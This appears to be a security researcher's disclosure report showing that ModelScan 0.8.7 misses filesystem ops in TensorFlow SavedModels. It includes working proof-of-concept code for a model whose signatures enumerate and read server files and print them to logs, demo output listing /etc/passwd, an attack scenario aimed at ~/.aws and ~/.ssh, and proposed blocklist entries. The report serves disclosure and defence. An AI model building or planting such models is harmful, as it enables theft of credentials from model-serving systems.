TF SAVEDMODEL SCANNER BYPASS: FILESYSTEM OPS NOT FLAGGED

Tested on: ModelScan v0.8.7
Format: TensorFlow SavedModel (saved_model.pb inside a SavedModel directory)

================================================================================ SUMMARY

ModelScan scans TensorFlow SavedModels for known "unsafe ops" without executing them. This report demonstrates a gap: a SavedModel that contains filesystem-capable ops (file enumeration and file reading via dataset ops) still passes scanning, because those ops are not on ModelScan's unsafe-op list.

================================================================================ THREAT MODEL

  • Victim loads and executes an untrusted SavedModel in CI/serving pipeline
  • Model server (TF Serving, Triton, etc.) automatically calls signatures
  • Logs may be collected centrally (common in production deployments)

================================================================================ TRIGGER CONDITION

The malicious behavior executes when a graph signature is run (a typical inference call), not at load time. The PoC model exposes these signatures:

  • enumerate_files(pattern) -> uses MatchingFiles op
  • read_text_file(filepath) -> uses TextLineDataset op
  • exfil_files(pattern) -> uses MatchingFiles + PrintV2 ops
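To make the mechanism concrete, the following is a minimal sketch of how signatures like these can end up in a SavedModel graph. `FilesystemModule` and `poc_model_dir` are illustrative names, not the actual PoC artifact, and the exact supporting ops serialized into the graph may differ from those listed in PROOF-2.

```python
import tensorflow as tf

class FilesystemModule(tf.Module):
    """Illustrative module whose exported graph contains MatchingFiles,
    TextLineDataset-family, and PrintV2 ops."""

    @tf.function(input_signature=[tf.TensorSpec(shape=(), dtype=tf.string)])
    def enumerate_files(self, pattern):
        # tf.io.matching_files lowers to the MatchingFiles op.
        return tf.io.matching_files(pattern)

    @tf.function(input_signature=[tf.TensorSpec(shape=(), dtype=tf.string)])
    def read_text_file(self, filepath):
        # tf.data.TextLineDataset embeds file-reading dataset ops in the graph.
        ds = tf.data.TextLineDataset(filepath)
        return ds.reduce(tf.constant("", tf.string),
                         lambda acc, line: tf.strings.join([acc, line, "\n"]))

    @tf.function(input_signature=[tf.TensorSpec(shape=(), dtype=tf.string)])
    def exfil_files(self, pattern):
        files = tf.io.matching_files(pattern)
        # tf.print lowers to PrintV2 and writes to stderr / TF logs.
        tf.print("EXFILTRATED:", files)
        return files

m = FilesystemModule()
tf.saved_model.save(
    m, "poc_model_dir",
    signatures={
        "enumerate_files": m.enumerate_files,
        "read_text_file": m.read_text_file,
        "exfil_files": m.exfil_files,
    },
)
```

Nothing here is exotic TensorFlow: every call is a documented public API, which is exactly why the resulting graph looks unremarkable to a signature-agnostic scanner.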

================================================================================ PROOF-1: ModelScan Output (Bypass Confirmed)

$ modelscan --version
modelscan, version 0.8.7

$ modelscan --path ultimate_attack_poc/
Scanning ultimate_attack_poc/fingerprint.pb using modelscan.scanners.SavedModelTensorflowOpScan
Scanning ultimate_attack_poc/saved_model.pb using modelscan.scanners.SavedModelTensorflowOpScan

--- Summary ---
No issues found!

================================================================================ PROOF-2: Dangerous Ops Present in saved_model.pb

Core dangerous ops (NOT BLOCKED):

MatchingFiles    <-- FILESYSTEM ENUMERATION (HIGH)
TextLineDataset  <-- FILE CONTENT READING (HIGH)
PrintV2          <-- DATA EXFIL TO LOGS (MEDIUM - depends on log collection)

Supporting ops:

DatasetCardinality  <-- Metadata disclosure (file line count)
FlatMapDataset      <-- Dataset iteration
TensorSliceDataset  <-- Dataset iteration

Note: ReadFile and WriteFile are NOT present in this model. The model uses alternative filesystem ops that provide equivalent capabilities but are not in ModelScan's blocklist.
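The presence of these ops can be confirmed without TensorFlow installed. Op names appear as plain ASCII strings in the serialized NodeDef messages inside saved_model.pb, so a raw byte search is a quick (if imprecise) check. The sketch below is a rough heuristic, not a protobuf parser; `grep_ops` is a hypothetical helper name, and a string constant in the graph could cause a false positive.

```python
# Rough heuristic: NodeDef op names are serialized as plain ASCII strings
# inside saved_model.pb, so a byte-level search can confirm their presence
# without parsing the protobuf. False positives are possible (e.g. a string
# constant that happens to contain an op name), but a hit warrants review.
SUSPECT_OPS = [b"MatchingFiles", b"TextLineDataset", b"PrintV2",
               b"ReadFile", b"WriteFile"]

def grep_ops(pb_path):
    """Return the suspect op names whose bytes occur in the file."""
    with open(pb_path, "rb") as f:
        blob = f.read()
    return [op.decode() for op in SUSPECT_OPS if op in blob]
```

Running `grep_ops("ultimate_attack_poc/saved_model.pb")` against the PoC should surface MatchingFiles, TextLineDataset, and PrintV2 even though ModelScan reports no issues.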

================================================================================ PROOF-3: SavedModel Signatures

$ saved_model_cli show --dir ultimate_attack_poc --all

Concrete Functions:
  Function Name: 'enumerate_files'
    Callable with:
      Argument #1
        pattern: TensorSpec(shape=(), dtype=tf.string)

  Function Name: 'read_text_file'
    Callable with:
      Argument #1
        filepath: TensorSpec(shape=(), dtype=tf.string)

  Function Name: 'exfil_files'
    Callable with:
      Argument #1
        pattern: TensorSpec(shape=(), dtype=tf.string)

================================================================================ PROOF-4: Execution Demonstration

>>> import tensorflow as tf
>>> model = tf.saved_model.load('ultimate_attack_poc')

TRIGGER: Running 'enumerate_files' signature (MatchingFiles op)

>>> model.enumerate_files('/etc/pass*')
['/etc/passwd', '/etc/passwd-']

TRIGGER: Running 'enumerate_files' to discover home directories

>>> model.enumerate_files('/home/*')
['/home/', '/home/ubuntu']

TRIGGER: Running 'exfil_files' signature (PrintV2 op)

>>> model.exfil_files('/home/*')
EXFILTRATED: ["/home/" "/home/ubuntu"]   # <-- appears in TF logs

================================================================================ ATTACK SCENARIO (REALISTIC)

  1. Attacker publishes a "normal-looking" TensorFlow SavedModel (e.g., image classifier) to a model hub or internal registry.

  2. Model passes the ModelScan security gate; the scanner reports "No issues found!"

  3. Victim's model server (TF Serving, Triton, etc.) loads the model and automatically runs inference when requests arrive.

  4. On each inference call, the model:

    • Enumerates local files via MatchingFiles (discovers ~/.aws/, ~/.ssh/)
    • Reads file contents via TextLineDataset (if text files)
    • Optionally prints data via PrintV2 (appears in TF logs)
  5. If logs are shipped to central logging (Splunk, ELK, CloudWatch - common in production), attacker can retrieve the exfiltrated data.

================================================================================ IMPACT

Impact                  Severity  Description
Scanner bypass          HIGH      Model passes scan despite filesystem ops
Filesystem enumeration  HIGH      MatchingFiles discovers sensitive paths
File content reading    HIGH      TextLineDataset reads accessible files
Log-based exfiltration  MEDIUM    PrintV2 leaks data (if logs collected)

This bypass undermines the expectation that ModelScan detects filesystem access in SavedModels, allowing malicious models to pass automated security gates.

Note: All file access is limited to files readable by the serving process user.

================================================================================ MODELSCAN BLOCKLIST ANALYSIS

Current blocklist in modelscan/settings.py:

"unsafe_tf_operators": {
    "ReadFile": "HIGH",
    "WriteFile": "HIGH",
}

These filesystem ops are NOT blocked:

Op               Capability                     Risk
MatchingFiles    Enumerate files via glob       HIGH
TextLineDataset  Read text file line-by-line    HIGH
PrintV2          Output to logs (exfil vector)  MEDIUM

================================================================================ RECOMMENDED FIX (SCANNER-SIDE)

Expand the unsafe-operator coverage for filesystem-related TensorFlow ops:

"unsafe_tf_operators": {
    # Currently blocked
    "ReadFile": "HIGH",
    "WriteFile": "HIGH",

    # Should be added (file enumeration)
    "MatchingFiles": "HIGH",

    # Should be added (file reading via datasets)
    "TextLineDataset": "HIGH",
    "TextLineDatasetV2": "HIGH",
    "FixedLengthRecordDataset": "HIGH",

    # Should be added (potential exfiltration - depends on log setup)
    "PrintV2": "MEDIUM",
}
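The effect of the expanded list can be sketched in a few lines of plain Python. This is not ModelScan's actual code, only a minimal model of a blocklist check, assuming the op set extracted from the PoC graph matches PROOF-2; `flagged` is a hypothetical helper name.

```python
# Ops present in the PoC graph (from PROOF-2).
poc_ops = {"MatchingFiles", "TextLineDataset", "PrintV2",
           "DatasetCardinality", "FlatMapDataset", "TensorSliceDataset"}

# Stock blocklist vs. the proposed expansion.
stock_blocklist = {"ReadFile": "HIGH", "WriteFile": "HIGH"}
expanded_blocklist = {**stock_blocklist,
                      "MatchingFiles": "HIGH",
                      "TextLineDataset": "HIGH",
                      "TextLineDatasetV2": "HIGH",
                      "FixedLengthRecordDataset": "HIGH",
                      "PrintV2": "MEDIUM"}

def flagged(ops, blocklist):
    """ModelScan-style check: report any graph op found on the blocklist."""
    return sorted(op for op in ops if op in blocklist)

print(flagged(poc_ops, stock_blocklist))
# []  -> "No issues found!" despite the filesystem ops
print(flagged(poc_ops, expanded_blocklist))
# ['MatchingFiles', 'PrintV2', 'TextLineDataset']
```

With the stock list the intersection is empty, which is exactly the bypass shown in PROOF-1; the expanded list flags all three core ops.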

================================================================================ FILES PROVIDED

ultimate_attack_poc/
├── saved_model.pb     # Contains the dangerous ops
├── fingerprint.pb
└── variables/
    ├── variables.data-00000-of-00001
    └── variables.index

================================================================================

Researcher: Karim Foughali
Email: kfoughali@dzlaws.org
Date: January 2026
